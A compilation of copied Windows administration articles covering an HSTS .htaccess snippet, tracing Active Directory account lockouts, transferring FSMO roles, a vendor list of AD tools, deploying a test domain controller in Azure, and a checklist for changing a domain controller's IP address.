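RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS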

Source :
https://bootpanic.com/warning-unnecessary-hsts-header-over-http/

How to Find the Source of Account Lockouts in Active Directory

In this post, you will learn how to find the source of account lockouts in Active Directory.

Here are the steps to find the source of account lockouts:

Users locking their accounts is a common problem; it’s one of the top calls to the helpdesk.

What is frustrating is when you unlock a user’s account and it keeps randomly locking. The user could be logged into multiple devices (phone, computer, application, and so on), and when they change their password it will cause ongoing lockout issues.

This guide will help you to track down the source of those lockouts.

Check it out:

Step 1: Enabling Auditing Logs

The first step to tracking down the source of account lockouts is to enable auditing. If you do not turn on the proper auditing logs then the lockout events will not be logged.

Here are the steps to turn on the audit logs:

1. Open Group Policy Management Console

This can be from the domain controller or any computer that has the RSAT tools installed.

2. Modify Default Domain Controllers Policy

Browse to the Default Domain Controllers Policy, right-click, and select edit. You can also create a new GPO on the “Domain Controllers” OU if you prefer to not edit the default GPO.

3. Modify the Advanced Audit Policy Configuration

Browse to Computer Configuration -> Policies -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Account Management

Enable success and failure for the “Audit User Account Management” policy.

Next, enable the following:

Computer Configuration -> Policies -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Account Logon

Enable Success and Failure for “Audit Kerberos Authentication Service”.

Auditing is now turned on, and event 4740 will be logged in the security event logs when an account is locked out. In addition, the Kerberos logs are enabled, which will log authentication failures associated with the lockout. Sometimes event 4740 does not log the source computer, and the Kerberos logs provide additional details.
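
To verify that the settings have taken effect (after a gpupdate on the domain controllers), you can check the resulting audit policy from an elevated command prompt, for example:

auditpol /get /subcategory:"User Account Management"
auditpol /get /subcategory:"Kerberos Authentication Service"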

Step 2: Using the User Unlock GUI Tool to Find the Source of Account Lockouts

This step uses the User Unlock Tool to find the event ID 4740 and other event IDs that will help troubleshoot lockouts.

I created this tool to make it super easy for any staff member to unlock accounts, reset passwords and find the source of account lockouts. It also has some additional features to help find the source of lockouts.

This is a much easier option than PowerShell.

1. Open the AD Pro Toolkit

You can download a free trial here.

Click on the “User Unlock” tool in the left side menu.

2. Select Troubleshoot Lockouts

Select Troubleshoot lockouts and click Run.

You will now have a list of events that will show the source of a lockout or the source of bad authentication attempts.

In the above screenshot, you can see the account “robert.allen” lockout came from computer PC1.

There will be times when event 4740 does not show the source computer. When that happens you can use the other logged events to help troubleshoot lockout events. For example, if the above screenshot had no event 4740, I could look at event 4771 and see that the failed authentication attempt came from a computer with the IP 192.168.100.20.

In addition, you can unlock the account and reset the password all from one tool. The tool will display all locked accounts, and you can select a single account or multiple accounts to unlock.

The unlock tool is part of the AD Pro Toolkit. Download your free trial here.

Step 3: Using PowerShell to Find the Source of Account Lockouts

Both the PowerShell method and the GUI tool need auditing turned on before the domain controllers will log any useful information.

1. Find the Domain Controller with the PDC Emulator Role

If you have a single domain controller (shame on you) then you can skip to the next step…hopefully you have at least two DCs.

The DC with the PDC emulator role will record every account lockout with an event ID of 4740.

To find the DC that has the PDCEmulator role, run this PowerShell command:

get-addomain | select PDCEmulator

2. Find Event ID 4740 Using PowerShell

All of the details you need are in event 4740. Now that you know which DC holds the PDCEmulator role, you can filter its logs for this event.

On the DC holding the PDCEmulator role, open PowerShell and run this command:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4740}

This will search the security event logs for event ID 4740. If you have any account lockouts, you should see a list like the one below.

To display the details of these events and get the source of the lockout use this command.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4740} | fl

This will display the caller computer name of the lockout. This is the source of the user account lockout.
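
If you want just the locked account and the caller computer in a table, a small sketch like the one below works; note that the property indexes are assumptions based on the usual layout of event 4740 and may need adjusting in your environment:

# query the PDC emulator for lockout events and pull out the interesting fields
$pdc = (Get-ADDomain).PDCEmulator
Get-WinEvent -ComputerName $pdc -FilterHashtable @{LogName='Security'; Id=4740} |
    Select-Object TimeCreated,
        @{Name='LockedAccount';  Expression={$_.Properties[0].Value}},
        @{Name='CallerComputer'; Expression={$_.Properties[1].Value}}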

You can also open Event Viewer and filter the security log for event 4740.

Although this method works, it takes a few manual steps and can be time consuming. You may also have staff who are not familiar with PowerShell and need to perform other functions, such as unlocking or resetting the user’s account.

That is why I created the Active Directory User Unlock GUI tool. This tool makes it super easy for staff to find all locked users and the source of account lockouts.

I hope you found this article useful. If you have questions or comments let me know by posting a comment below.

Source :
https://activedirectorypro.com/find-the-source-of-account-lockouts/

How to Transfer FSMO Roles (2 Easy Steps)

how to transfer fsmo roles

Do you need to transfer FSMO roles to another domain controller?

No problem, it is very easy to do.

In this tutorial, I’ll show you step-by-step instructions to transfer the FSMO roles from one domain controller to another. I’ll show you two methods: the first is using PowerShell and the second is using the ADUC GUI.

Why Transfer FSMO roles?

By default, when Active Directory is installed, all five FSMO roles are assigned to the first domain controller in the forest root domain. Transferring FSMO roles is often needed for several reasons, such as decommissioning or replacing the current role holder.

It is recommended to only transfer FSMO roles when the current role holder is operational and is accessible on the network. For a complete list of considerations see the MS article Transfer or seize FSMO Roles in Active Directory Services.

Step 1: List Current FSMO Role Holders

Before moving the FSMO roles it is a good idea to check which domain controllers hold which roles.

You can list which domain controllers hold FSMO roles with these two PowerShell commands:

Get domain level FSMO roles

get-addomain | select InfrastructureMaster, PDCEmulator, RIDMaster

Get forest level FSMO roles

Get-ADForest | select DomainNamingMaster, SchemaMaster

Below is a screenshot of the results in my domain.

get fsmo roles

List of installed roles in my domain:

  • InfrastructureMaster is on DC1
  • PDCEmulator is on DC2
  • RIDMaster is on DC2
  • DomainNamingMaster is on DC1
  • SchemaMaster is on DC1

I want to move all the roles from DC2 to DC1, and I’ll demonstrate this below.

Step 2: Transfer FSMO Roles

I’ll first demonstrate transferring roles with PowerShell, it is by far the easier option of the two (in my opinion).

You want to log into the server that you will be transferring the roles to; in my case that is DC1.

To move a role with PowerShell you use the Move-ADDirectoryServerOperationMasterRole cmdlet with the hostname of the server you are transferring to, followed by the role to move.

Transfer PDCEmulator

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" PDCEmulator

Transfer RIDMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" RIDMaster

Transfer InfrastructureMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" Infrastructuremaster

Transfer DomainNamingMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" DomainNamingmaster

Transfer SchemaMaster

Move-ADDirectoryServerOperationMasterRole -Identity "dc1" SchemaMaster

Here is a screenshot of when I moved PDCEmulator and RIDMaster to DC1.

transfer fsmo roles with powershell

Now if I re-run the commands to list the FSMO roles I should see them all on DC1.

list fsmo roles again

Yes, I have confirmed all the roles are now on DC1. As you can see moving FSMO roles with PowerShell is very easy to do.

Now let’s see how to transfer FSMO roles using the Active Directory Users and Computers GUI.

Transfer FSMO Roles Using ADUC GUI

Just like PowerShell you need to log into the server that you will be transferring to. I’m transferring from DC2 to DC1 so I’ll log into DC1.

Open the Active Directory Users and Computers console, then right-click on the domain and click on operations masters.

move operations masters roles with GUI

You should now see a screen with three tabs (RID, PDC, and Infrastructure).

transfer RID role with gui

To transfer one of these roles, just click the change button. You can’t select which domain controller to transfer the role to; that is why you need to log into the server that you want to transfer to. If I wanted to transfer the RID role to DC3, I would log into that server.

To transfer the domain naming operations master role you will need to open Active Directory Domains and Trusts. Right-click on “Active Directory Domains and Trusts” and select “Operations Master”.

move operations master role with gui

Now click change to transfer the role to another DC.

moving roles

To transfer the schema master role follow these steps.

Open a command line and run the command regsvr32 schmmgmt.dll

register schmngmt.dll

Next, you need to open an MMC console. To do this, click on Start, type mmc, and click the icon.

open mmc console

Next, click File, then Add/Remove Snap-in

add remove to mmc console

Add “Active Directory Schema” from the list and click ok.

add active directory schema to mmc console

Right-click on “Active Directory Schema” and change the domain controller to the server you want to transfer the role to.

In this example, I’ll change the domain controller to DC2.

Now you can right-click on Active Directory schema and select “Operations Master” to transfer the schema master role.

Confirm the role is changing to the correct DC and click the “change” button.

As you can see, transferring FSMO roles with the GUI takes a lot of extra steps, and that is why I prefer to use PowerShell. But if you are not into PowerShell, the GUI works just fine.

Summary

Moving FSMO roles to another server is not a daily task but is necessary at times. Microsoft recommends the server be online when moving roles. The steps in this tutorial should help you when it comes time to move roles.

Source :
https://activedirectorypro.com/transfer-fsmo-roles/

Active Directory Tools and Management Software (2022 Update)

A list of the best Active Directory tools to help you simplify and automate Microsoft Active Directory management tasks.

The native Windows Administrative Tools are missing many features that administrators need to effectively do their jobs. Things like bulk operations and automation are just not possible with the Active Directory users and computer consoles.

The good news is there are many useful Active Directory Tools to choose from that can help you manage domain users, groups, and computers, generate reports, find security weaknesses, and more.

Check it out:

1. AD Bulk User Import

bulk user import tool

The Bulk Import tool makes it easy to import new user accounts into Active Directory from CSV. Includes a CSV template, sets multiple user attributes, and adds users to groups during the import. Automate the creation of new user accounts and simplify the user account provisioning process.

Key Features

  • Easily bulk import new accounts
  • Includes a CSV template
  • Logs the import process
  • Add users to groups during the import process

2. Active Directory Explorer

active directory explorer

Active Directory Explorer is a browser for navigating the AD database, objects, permissions, and schema objects within Active Directory. The interface is similar to Active Directory Users and Computers but allows you to view advanced settings. This is not a tool you would use on a daily basis; it is used for very specific tasks such as viewing an object’s attributes and security permissions.

Another neat feature is the ability to save a snapshot of the AD database. You can then load it for offline viewing and explore it like it was a live database. Again not a common use case.

Key Features

  • Easily explore the Active Directory database
  • View all object attributes
  • View the Active Directory Schema
  • Take a snapshot of the Database and view offline

3. Adaxes

adaxes

Adaxes is a premium product that automates many AD management tasks, like user provisioning, assigning permissions, creating mailboxes, delegation, and much more. All management tasks are done from a web interface and can be accessed from laptops, tablets, and phones. The web interface is fully customizable so you can view just what you need. It also includes a user self-service portal and a password self-service portal.

Key Features

  • Role-based access control
  • Fully automate AD tasks
  • Web interface

4. User Export Tool

user export tool

The user export tool lets you export all users plus all common user fields to a CSV. Over 40 user fields can be added to the export by clicking the change columns button. This is a great tool if you need a report of all users, the groups they are a member of, OU, and more.

Key Features

  • Find users TRUE last logon date from all domain controllers
  • Export report to a CSV file
  • Filter and search columns
  • Easy to report on OUs or groups

5. Bulk User Updater

bulk updater

This tool lets you bulk update user account properties from a CSV file. Some popular use cases are bulk updating users’ proxyAddresses, employeeID, addresses, manager, state, country, and so on.

All changes are sent to a log file which lets you keep track of changes and check for errors. This is a very popular tool!

Key Features

  • Bulk update user account properties
  • Includes CSV template
  • Logs changes and errors
  • Saves a lot of time

6. AD Cleanup Tool

ad cleanup tool

The AD Cleanup tool searches your domain for stale and inactive user accounts based on the account’s lastLogon attribute. You can also find disabled accounts, expired accounts, accounts that have never been used, and empty groups.

It is recommended to run a cleanup process on your domain at least once a month; this tool can help simplify that cleanup process and secure your domain.

Key Features

  • Quickly find old user and computer accounts
  • Limit the scope to OUs and groups
  • Bulk move and disable old accounts
  • Find all expired user accounts

7. SolarWinds Server & Application Monitor

solarwinds sam

This utility was designed to monitor Active Directory and other critical services like Azure, DNS, and DHCP. It will quickly spot domain controller issues, replication problems, performance issues with cloud services, failed logon attempts, and much more.

This is a premium tool with a big price tag, but it’s an incredible product. You can monitor all resources including applications, hardware, processes, and cloud systems. Everything is accessed from a single web console, and you can get email alerts based on various thresholds.

Key Features

  • Customizable dashboard
  • Email alerts
  • 1,200 out-of-the-box templates
  • Diagnose AD replication issues
  • Monitor account logins

SolarWinds Server Monitor provides a fully functional 30-day free trial.

8. Active Directory Health Monitor

ad heatlh monitor

If you want a simple tool to monitor your Active Directory services then this is a great tool.

Check the health of your domain controllers with this easy to use tool. Runs 27 health checks on your servers to check for critical errors. Click on any failed test to quickly see the details.

Also includes an option to test DNS and check event logs for critical events.

Key Features

  • Quickly check domain controller health
  • Check DNS health
  • Very easy to use
  • Export report to csv file

9. User Unlock and Lockout Troubleshooter

troubleshoot account lockouts

Find all locked users with the click of a button. Unlock accounts, reset passwords, or show advanced details like the source of the lockout and more. To pull the source computer you need to have auditing enabled; check the administrator guide for how to enable this.

Key Features

  • Find the source of account lockouts
  • Fast and easy to use
  • Unlock multiple accounts at once
  • Reset and unlock accounts from a single interface

10. Bulk Group Membership Updater

group membershi updater

Bulk add or remove users to Active Directory groups. You can bulk add users to a single group or multiple groups all at once. Very easy to use and saves a lot of time. Just add the users to the CSV template and the name of the group or groups you want to add them to.

Key Features

  • Easily bulk add users to groups
  • Bulk remove users from groups
  • Add groups to groups

11. Last Logon Reporter

user last logon reporter

The last logon reporter will get the user’s TRUE last logon time from all domain controllers in your domain. You can limit the search to the entire domain, organizational unit, or groups.

12. AD FastReporter

ad fast reporter

AD FastReporter has a large list of pre-built reports to pick from. Report on users, computers, groups, contacts, printers, group policy objects, and organizational units. Very easy to use but does have an older style interface.

Here is a small example of the reports you can run:

  • All users
  • Deleted Users
  • Users with a home directory
  • Users without a logon script
  • All computers
  • All domain controllers
  • Computers created in the last 30 days
  • Users created in the last 30 days

13. Local Group Report

local group manager

This tool gets the local groups and group members on remote computers. You can quickly sort or filter the groups to get a list of all users and groups that have local administrator rights.

Click here to watch a demo.

Key Features

  • Easily get group membership on remote computers
  • Quickly find who has administrator rights
  • Filter for any group or member

14. Group Membership Report Tool

get users group membership

Reporting and exporting group membership has never been easier; select from the entire domain, groups, or an organizational unit. This tool also helps to find nested security groups.

Key Features

  • The fastest way to get all domain groups and group membership
  • Export report to a CSV
  • Limit scope to an OU or group

15. Dovestones AD Reporting

dovestones ad reporting

Dovestones AD Reporting tool contains a large number of pre-built reports. You can customize the reports by selecting user attributes and defining which users to export.

16. Computer Uptime Report

computer uptime

Get the uptime and last boot of remote computers. Report on the entire domain or select from an OU or group.

Very helpful during maintenance days to verify if computers have rebooted.

17. SolarWinds Permissions Analyzer

solarwinds permissions analyer

This FREE tool lets you get instant visibility into user and group permissions. Quickly check user or group permissions for files, network, and folder shares.

Analyze user permissions based on an individual user or group membership.

Download Free Tool

18. NTFS Permissions Reporter

ntfs permissions tool

The NTFS permissions tool will report folder security for local, remote, and UNC folder permissions. The grid view comes with a powerful filter so you can search and limit the results to find specific permissions such as Active Directory groups.

19. Windows PowerShell

Windows PowerShell is a very powerful tool that can automate many Active Directory and Windows tasks. The problem is it can be complex to learn some of the advanced functions. With that said there are plenty of cmdlets that can be used in a single line of code to do some pretty cool things in Windows.

  • Create a new user account: New-ADUser
  • Create a computer account: New-ADComputer
  • Create a security group: New-ADGroup
  • Create an organizational unit: New-ADOrganizationalUnit
  • Get domain details: Get-ADDomain
  • Get the domain password policy: Get-ADDefaultDomainPasswordPolicy
  • Get group policy objects: Get-GPO -All
  • Get all services: Get-Service
  • Find locked user accounts: Search-ADAccount -LockedOut
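
These cmdlets can also be combined into quick one-liners; for example, running the following from an account with sufficient rights finds every locked account and unlocks it:

Search-ADAccount -LockedOut | Unlock-ADAccount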

20. Windows sysinternals

windows sysinternals

Sysinternals is a suite of small GUI programs and command-line utilities designed to troubleshoot and diagnose your Windows systems and applications. They are all portable, which means you don’t need to install them; you can just run the exe or commands with no installation required.

These utilities were created way back in 1996 by Mark Russinovich and were later acquired by Microsoft. There are a bunch of tools included; I will list some of the popular ones.

  • Process Monitor – Shows real-time file system, registry, and process activity
  • PsExec – Lets you execute programs on a remote system
  • PsKill – Kills local and remote processes
  • Sysmon – Logs system activity such as process creations, network connections, and changes to files
  • PsInfo – Shows info about a local or remote computer

All-in-one Active Directory Toolkit

Our AD Pro Toolkit includes 12 Active Directory tools in a single interface.

Tools included in the AD Pro Toolkit:

  • Bulk User Import
  • Bulk User Updater
  • AD Cleanup Tool
  • Last Logon Reporter
  • User Export to CSV
  • Unlock and Account Troubleshooter
  • Group Reporter
  • Group Management Tool
  • NTFS Permissions Report
  • Local Group Management
  • AD Health Monitor
  • Uptime last boot

Download a Free trial of the AD Pro Toolkit

What are the benefits of Active Directory Tools?

The main benefit is it will save you time and make managing Active Directory easier. One of the most popular tasks of working with Active Directory is to create new user accounts. The built-in tools provide no options for bulk importing new accounts so it becomes very time-consuming. With the AD Pro Toolkit you can easily bulk import, bulk update, and disable user accounts.

Below is a picture of how you would create an account with the built-in (ADUC) Active Directory Users and Computers console. Everything has to be manually entered and you have to go back and add users to groups.

Using Active Directory tools like the AD Bulk Import tool, you can bulk import thousands of accounts at once. Plus you can automatically set user accounts fields and add users to groups. Let me show you how easy it is.

Step 1: Fill out the provided CSV template.

The template includes all the common user fields you need to create a new account. Just fill out what you need and save the file.

Step 2: Import new account

With this tool just select your CSV file and click run. This will import all of the account information from the CSV and automatically bulk create new Active Directory user accounts.

You can watch the import process and when complete you have a log file of the import.

You will at some point be asked to export users to a CSV, and again there is no easy built-in option for this. When I was an administrator at a large organization I would get this request at least once a week, and it was a pain. When I developed the user export tool this process became so easy I was able to have other staff members take it over.

The above picture is from the user export tool. This tool lets you easily export all users from the entire domain, an OU, or a group.

The ease of use is another benefit as many people don’t have time to learn PowerShell. PowerShell is a great tool and can do many things but it can be complex and time-consuming to learn. The AD Pro Toolkit has a very simple interface and you can start using it right away to perform many advanced tasks in your domain.

Frequently Asked Questions

Below are questions and answers regarding the AD Pro Toolkit.

Does the AD Pro Tool support multiple domains?

Yes. It will auto-detect your domains based on current credentials. You can click the domain button to change authentication and connect to other domains or domain controllers.

Do you have a tool to help with account lockouts?

Yes, the user unlock tool can quickly display all locked users and the source of the lockout.

What is required to use the toolkit?

To create and bulk modify users you will need sufficient rights in your Active Directory domain. This is often done by putting your account in the Domain Admins group, but it can also be done by delegating these rights. Some tools, like the last logon reporter, export, and group membership tools, require no special permissions.

Do I need to know PowerShell or scripting?

No. All tools are very easy to use and require no scripting or PowerShell experience.

Is there a way to bulk update the manager, telephone numbers, and other user fields?

Yes, this is exactly what the bulk updater tool was created for. You can easily bulk update from a large list of user fields.

Can I bulk export or import on a scheduled task?

We are working on this right now. AD Cleanup, bulk import, update, and export tools will include an option to run on a scheduled task or from a script.

I was just hired and Active Directory is a mess. Can the Pro toolkit help?

The AD Cleanup tool can help you find old user and computer accounts and bulk disable or move them. We have many customers that use this tool to clean up their domain environments.

Source :
https://activedirectorypro.com/tools/

How to Deploy a Domain Controller in Azure

In this guide, I will demonstrate how to deploy a domain controller in Azure.

Deploying a Domain Controller in Azure can be used to add additional Domain Controllers to your on-premises environment. It’s also an easy way to create an Active Directory test lab.

Note: The VM I create in this demo is for testing; the settings are not optimal for a production domain controller. If you want to deploy a domain controller in Azure for production, you will need to determine the right settings for your organization, such as VM size (CPU, memory), redundancy options, disks, and network settings, all of which will increase the cost.

Tip #1: For a production DC, DO NOT give it a public IP or allow public inbound ports.

Tip #2: To add an Azure domain controller to your on-premises environment you will need a VPN tunnel from your network to Azure. I will go over this in a separate guide.

Tip #3: For production, the Azure virtual network must not overlap your on-premises network. For testing, it doesn’t matter (assuming you will not be connecting to your on-premises network).

Let’s get started.

Part 1: Create a Virtual Machine

If you don’t have an Azure account you can create one for free. Microsoft gives you a $200 Azure credit for 30 days. This is plenty of credits to create several VMs and use other Azure resources.

Step 1. Sign in to your Azure portal, https://portal.azure.com

Step 2. Click on “Virtual machines”

select virtual machines

Step 3. Click on Create and select “Azure virtual machine”

Step 4. Enter basic information for the new VM

  • Subscription: Select the subscription you want to use for the VM.
  • Resource group: Select an existing or create a new resource group.
  • Virtual machine name: Give your VM a name.
  • Region: Choose your region, you typically want a region that is close to you.
  • Availability options: This is for redundancy and will ensure your VMs are still running if one Azure data center has a failure. You want this for production VMs. I’m just creating a test VM so I’ll choose “No infrastructure redundancy required.”
  • Security Type: I’ll choose Standard.
  • Image: Pick the OS you want to use, I’ll pick “Windows Server 2019 Datacenter”.
  • Size: You will need to determine the size of VM you need. For testing reasons, I’ll choose a small VM to keep costs low.
  • Username and password: This will be the administrator account for the VM.
  • Public inbound ports: For production, you want this set to “none”. For testing, I’ll leave RDP open.
  • Licensing: If you have an existing license you can use, select the box; this can save money on each VM.

Here is a screenshot of the Basics settings for my VM.

virtual machine basic settings

Now click Next to go to the Disks page.

Step 5. Enter disk details for the VM.

Determine the disk type to use; for testing I use the standard HDD.

virtual machine disk settings

Click next to go to networking.

Step 6. Network settings

  • Virtual network: Select an existing or create a new virtual network.
  • Subnet: Select or create a subnet.

You create a virtual network and then use subnetting to segment the address space. For example, I’m using the 10.1.0.0/16 address space and then carving out the 10.1.10.0/24 subnet (256 addresses). I’ll use the 10.1.10.0/24 block for my servers.

virtual machine create virtual network
  • Public IP: A public IP will be added automatically. For testing this is OK; for production set this to none.
  • NIC network security group: This is a stateful firewall for your virtual network. I’ll choose standard.
  • Public inbound ports: For production, you want to select none. For testing, you can use RDP to access the VM.
virtual machine network inbound ports

Click next to “Management”

Step 7: Management Settings

The only thing I want to point out on this page is the “Auto-shutdown” option. For testing with Azure, this is a great feature to help save costs. You get charged for the VM running even if you are not using it. I’m not going to be using this test domain controller 24/7 so I’ll have it auto shut down at 7:00 PM each night. Do not do this for a production domain controller.

virtual machine auto shutdown

Step 8: Click Review + create

Microsoft will validate your settings and show any warnings or settings that were missed. You will also get a cost estimate but keep in mind it is just an estimate.

virtual machine validation check

When ready click the “Create” button to create the VM.

You will get a progress page so you can watch the status of the deployment. It took about 5 minutes for my VM to be created.

virtual machine deployment completed
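
If you would rather create the test VM from PowerShell instead of the portal, here is a rough sketch using the Az module's simplified New-AzVM parameter set. The resource group, VM name, size, and network names are assumptions for this example; like the portal walkthrough above, this opens RDP and adds a public IP, which is only acceptable for testing.

# Prompt for the VM's local administrator credentials
$cred = Get-Credential

# Create a small test VM attached to the virtual network and subnet created earlier
New-AzVM -ResourceGroupName "rg-lab" -Name "AZ-DC01" -Location "eastus" `
    -VirtualNetworkName "vnet-lab" -SubnetName "snet-servers" `
    -Image "Win2019Datacenter" -Size "Standard_B2ms" `
    -Credential $cred -OpenPorts 3389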

Part 2: Configure VM with Static IP Addresses

Domain controllers need a static IP address and DNS pointing to themselves. For on-premises DCs you would just go into the NIC settings and manually configure the IP settings. With Azure VMs, it's recommended to set this on the virtual network interface in the Azure portal rather than inside the guest OS.

Go to VM Networking settings.

In the right-hand menu for your VM under settings click on “Networking”.

configure vm static ip

Now click on the Network Interface for the VM (You will have a different name).

virtual network network interface

Next click on “IP Configurations” in the left menu under settings.

Next click on “ipconfig1” under IP configurations.

ip configuration

Change the IP from “Dynamic” to “Static” and enter the IP address you want the domain controller to have; it must be an IP from the subnet you assigned to your virtual network. I’ll give my DC the IP address 10.1.10.10.

set static ip address on vm

Click “Save”. The network interface will be restarted to set the IP address.

Go back to the Network Interface and click on “DNS servers”.

network interface dns settings

Set the DNS server to the IP address of the domain controller.

set dns servers for nic

Now on the VM, your server should be configured with the settings from above. Below I run ipconfig /all to verify my IP settings.

ipconfig for virtual machine
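
The same static IP and DNS change can be made with the Az module. This is a sketch only; the NIC and resource group names below are placeholders for whatever names the portal generated for your VM.

# Get the VM's network interface
$nic = Get-AzNetworkInterface -Name "az-dc01-nic" -ResourceGroupName "rg-lab"

# Make the private IP static and set it to the DC's address
$nic.IpConfigurations[0].PrivateIpAllocationMethod = "Static"
$nic.IpConfigurations[0].PrivateIpAddress = "10.1.10.10"

# Point the NIC's DNS at the domain controller itself
$nic.DnsSettings.DnsServers.Clear()
$nic.DnsSettings.DnsServers.Add("10.1.10.10")

# Apply the changes (the NIC restarts, just like the portal change)
Set-AzNetworkInterface -NetworkInterface $nic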

Part 3: Install Active Directory Domain Services

With a VM created and the IP settings configured, we can move forward with installing Active Directory on the server. If you have installed AD DS before, this is not new; it's the same as installing it on an on-premises server.

Go to Server Manager and click on “Add roles and features”.

server manager add roles

Before you begin – click “Next”.

Installation type – select “Role-based or feature-based installation” and click “Next”.

Server Selection – select the hostname of your server and click “Next”.

Server Roles – select “Active Directory Domain Services”.

You will get a pop-up to add additional features. Click “Add Features”.

install active directory domain services

Click “Next”.

Features – no features need to be added so click “Next”.

AD DS – Click “Next”.

Confirmation – Click “Install”.

The installation will start.

When finished click the yellow icon in the upper right corner and click on “Promote this server to a domain controller”.

promote to domain controller

Deployment Configuration

I’m creating a new domain so I’m going to pick “Add a new forest”. If you’re adding another DC to your existing domain you would pick the first option “Add a domain controller to an existing domain”.

domain controller deployment config

Domain Controller Options

For a new test domain, the default settings are good. Add a DSRM password and click next.

domain controller options

DNS Options

Click next on this screen.

Additional Options

Enter a NetBIOS name and click “Next”

netbios domain name

Paths

I always leave these as default settings

Review Options

Review your settings and click “Next”

Prerequisites Check

If the prerequisites check passes, click “Install”.

deployment check

When the installation finishes, the server will reboot and will now be a domain controller.

domain controller install completed.

Nice work. If you followed along you should now have a domain controller running in the Azure cloud.

You can now deploy additional Azure VMs and connect them to this domain controller. You can also use this domain controller to add additional DCs to your on-premises environment.
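
If you would rather script the role install and promotion than click through the wizard, a minimal PowerShell sketch looks like the following. The domain name and NetBIOS name are placeholders; the server reboots automatically when the promotion finishes.

# Install the AD DS role and management tools
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools

# Prompt for the DSRM password
$dsrm = Read-Host -AsSecureString "Enter the DSRM password"

# Create a new forest and promote this server to a domain controller
Install-ADDSForest -DomainName "ad.example.com" -DomainNetbiosName "AD" `
    -SafeModeAdministratorPassword $dsrm -InstallDns -Force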

Part 4: Additional Settings and Tips

Here are a few additional settings and tips I recommend.

  1. You will need to create a new site in Active Directory Sites & Services with the new subnet (see the sketch after this list).
  2. You should adjust the domain controller DNS settings for redundancy.
  3. A VPN tunnel is required from your on-premises network to Azure.
  4. If you are testing and use a public IP with open ports (RDP 3389), then I recommend using fake/dummy data in Active Directory. The server might get compromised due to the internet exposure, so don’t use real data such as real usernames and passwords.
  5. You can use the Azure firewall to limit access to the VM to your IP address.
  6. Use Bastion for secure remote connectivity.
  7. Explore the many options Azure has to offer; it’s a very impressive platform.
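
For tip 1, here is a quick sketch of creating the site and subnet with the ActiveDirectory module. The site name is an example; use whatever matches your site design, and the subnet should be the one you assigned to the Azure virtual network.

# Create a new AD site for the Azure location and associate the Azure subnet with it
New-ADReplicationSite -Name "Azure"
New-ADReplicationSubnet -Name "10.1.10.0/24" -Site "Azure"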

Do you plan to use domain controllers running in Azure? Let me know in the comments below.

Resources

Recommended Tool: Permissions Analyzer for Active Directory

This FREE tool lets you get instant visibility into user and group permissions and allows you to quickly check user or group permissions for files, network, and folder shares.

You can analyze user permissions based on an individual user or group membership.

This is a Free tool, download your copy here.


Source:
https://activedirectorypro.com/deploy-domain-controller-azure/

Change IP Address on Domain Controller

In this post, I will demonstrate how to change the IP address on a domain controller.

Before you change the IP address it is very important to run through a checklist. Any changes to a domain controller can disrupt services and impact business operations. See my checklist below.

For this demonstration, I have the following settings.

  • DC1, IP Address 192.168.100.10
  • DC2, IP Address 192.168.100.11
  • DC3, IP Address 192.168.100.12

I’m going to change the IP on DC2 to 192.168.100.15. If you are changing to a different subnet there are additional things to consider that I go over in the checklist.

Pre-Change Checklist

I recommend reviewing each item on this checklist before making changes. I’ve migrated many domain controllers from small to large networks and these steps have been a lifesaver. If you do this often you will probably come up with your own checklist.

Do You Have Multiple Domain Controllers?

It is best practice to have multiple domain controllers and backup Active Directory for disaster recovery reasons. I do not recommend making major changes to domain controllers if you have a single domain controller. If you have multiple DCs and the change breaks the server you can still operate from a secondary DC.

You can get a list of all domain controllers in your domain with this command:

Get-ADDomainController -filter * | select hostname, domain, forest

Check FSMO Roles

Does the DC hold any FSMO roles? Easily check with this command:

netdom query fsmo

Below you can see all my FSMO roles are on DC1.

To help avoid disruption to authentication services, you could move the FSMO roles to another domain controller in the same site. Keep in mind you would also need to move any services that are manually configured to use that server.
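
If you do decide to move the roles, this is a sketch of transferring all five FSMO roles to another DC with the ActiveDirectory module (here DC1, the server I am not changing); run it from an elevated PowerShell session.

# Transfer all five operations master roles to DC1
Move-ADDirectoryServerOperationMasterRole -Identity "DC1" `
    -OperationMasterRole PDCEmulator, RIDMaster, InfrastructureMaster, SchemaMaster, DomainNamingMaster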

I’m making changes to DC2 which has no FSMO roles running on it.

Check Installed Roles and Features

I recommend checking what services are running on the server; you don’t want to change the IP and then have something break because you didn’t know it was a DHCP server or a web server.

  • Check the control panel for installed software
  • Check the installed roles and features

You can quickly check the installed roles and features with this command:

Get-WindowsFeature | Where-Object {$_.InstallState -eq "Installed"}

Below you can see my DC2 server has some critical services running on it including DHCP and DNS. I’ll need to consider this when changing IP addresses.

Find Devices Pointing to the Domain Controller with Wireshark

Wireshark can help you identify what systems are pointing to your domain controller for various services like DNS, DHCP, and so on. This might be the most important pre-change step.

Useful Wireshark filters:

  • dns
  • dhcp
  • ldap
  • dcerpc

Here is an example:

The packet capture shows that system 192.168.100.22 is using DC2 for DNS. I’ve done large migrations of domain controllers before and used Wireshark to help identify systems that were still pointing to old domain controllers. From experience, you will probably be surprised at how many systems are hardcoded to your DCs.
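
If you prefer the command line, roughly the same view is available with tshark, which ships with Wireshark. This is a sketch; the interface name is a placeholder and 192.168.100.11 is DC2's current IP from this example.

# Show only traffic to or from DC2 for the protocols listed above
tshark -i "Ethernet" -Y "ip.addr == 192.168.100.11 && (dns || dhcp || ldap || dcerpc)"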

Check Domain Controller Health

You need to check that your domain controller is healthy before making the change. Any issues could result in replication problems, DNS problems, and so on. I’ve got a complete guide on how to use dcdiag; it’s actually very easy to use. Just open the command prompt on your server and run the command.

dcdiag

Check The Health of DNS

By default, dcdiag does not test DNS. Use this command to run a complete test on DNS.

dcdiag /test:dns /v

Make sure the server passes all tests and the name resolution SRV record is registered.

Run Best Practice Analyzer

The Best Practice Analyzer can find configuration issues according to Microsoft best practices. The BPA tool is not always accurate, so you need to double-check its findings. Also, any errors or warnings do not mean your migration will fail; the tool simply helps you find major misconfigurations according to Microsoft best practices.
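
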